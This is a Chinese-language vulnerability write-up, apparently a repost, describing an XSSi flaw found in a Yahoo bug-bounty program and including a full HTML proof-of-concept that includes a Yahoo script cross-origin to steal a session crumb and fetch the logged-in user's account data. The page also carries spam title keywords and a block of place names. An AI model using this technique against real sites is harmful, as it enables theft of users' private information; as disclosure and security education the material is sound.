中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

發布時間:2021-12-18 14:26:07 來源:億速云 閱讀:141 作者:柒染 欄目:網絡管理

本篇文章為大家展示了發現雅虎XSSi漏洞實現用戶信息竊取的示例分析,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

發現某種特定類別漏洞由兩個關鍵部分組成,那就是對漏洞的認知以及挖掘的難易程度。跨站腳本包含漏洞(XSSi)在公認的安全標準OWASP TOP 10中并未被提及,而且它也沒有一些公開可利用的工具。但它的影響涉及個人存儲信息泄露、token保護機制繞過以及賬戶劫持等。目前來說,由于XSSi漏洞存在廣泛且缺乏有效的檢測手段,導致其漏洞危害程度增加。下面我將分享我發現的一個雅虎XSSi漏洞,利用該漏洞可以實現對雅虎用戶的信息竊取。

端倪

在參與雅虎(Yahoo)漏洞眾測項目中,在我某次用BurpSuite來進行抓包分析時,偶然看到了以下這個請求:

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

在我發現這是一個JSONP服務端之后,我立馬意識到這可能會形成一個XSSi漏洞(跨站腳本包含)。在雅虎網站API中,.crumb 值其實就是一個隨機字符串,它與用戶的session和身份驗證值相關,我注意到,如果在該請求中,GET參數 .crumb 值無效的話,其響應如下:

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

利用

現在,我想,如果能以某種方式去竊取到受害者的有效.crumb 值的話,那么就能竊取到對方的具體賬號信息值了。因此,我就在BurpSuite的抓包中來查找所有包含有效 .crumb 值的請求,最終,我發現了在某個動態的Javascript文件存在這樣的信息,該Javascript文件位于https://messenger.yahoo.com/embed/app.js。如果你現在去檢查這個Javascript文件,你會發現它其中的    logoutCrumb 值已經被刪除修復了,我初次發現時,它的源代碼如下: 

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

現在,XSSi 漏洞原理其實是這樣的,它允許攻擊者繞過原始邊界竊取特定類型數據,利用了<script>標記的src屬性來突破同源策略( SOP),也即在<script>標記中,瀏覽器不會阻止網頁加載圖像和文字等第三方資源。因此,為了竊取    https://messenger.yahoo.com/embed/app.js中的有效回調 .crumb 值,然后把它放置在鏈接https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx中進行請求,以獲取到相關用戶的session信息,我編寫了如下PoC代碼:

<html>    <head>        <title>Yahoo XSSi PoC</title>    </head>    <body>               <div >            <h2 >Proof of Concept</h2>            <b>Dataset 1:</b>            <div id="content1" ></div>            <br/>            <b>Dataset 2:</b>            <div id="content2" ></div>        </div>        <script>            function processDeviceUsers(data) {                document.getElementById("content1").innerHTML = JSON.stringify(data);            }            window.onload = function () {                var config = {};                config_data = {};                config.merge = function(data) { config_data = data };                iris.initConfig(config);                document.getElementById("content2").innerHTML =  JSON.stringify(config_data);                var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;                var s = document.createElement('script');                s.setAttribute('src', src);                document.body.appendChild(s);            }           </script>        <script src="https://messenger.yahoo.com/embed/app.js"></script>        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>    </body></html>

以下就是測試的效果圖:

發現雅虎XSSi漏洞實現用戶信息竊取的示例分析

上述內容就是發現雅虎XSSi漏洞實現用戶信息竊取的示例分析,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

修武县| 称多县| 崇仁县| 和顺县| 平果县| 清涧县| 和平县| 咸丰县| 宜春市| 茶陵县| 涿鹿县| 安乡县| 花莲市| 巨野县| 辽宁省| 平凉市| 鄂伦春自治旗| 墨竹工卡县| 绥德县| 平阳县| 河池市| 韩城市| 时尚| 昌图县| 长沙县| 蒙自县| 咸宁市| 万盛区| 博兴县| 华安县| 庆元县| 曲沃县| 读书| 阜康市| 龙陵县| 梁山县| 嘉义县| 阳江市| 安国市| 洪雅县| 苏尼特右旗|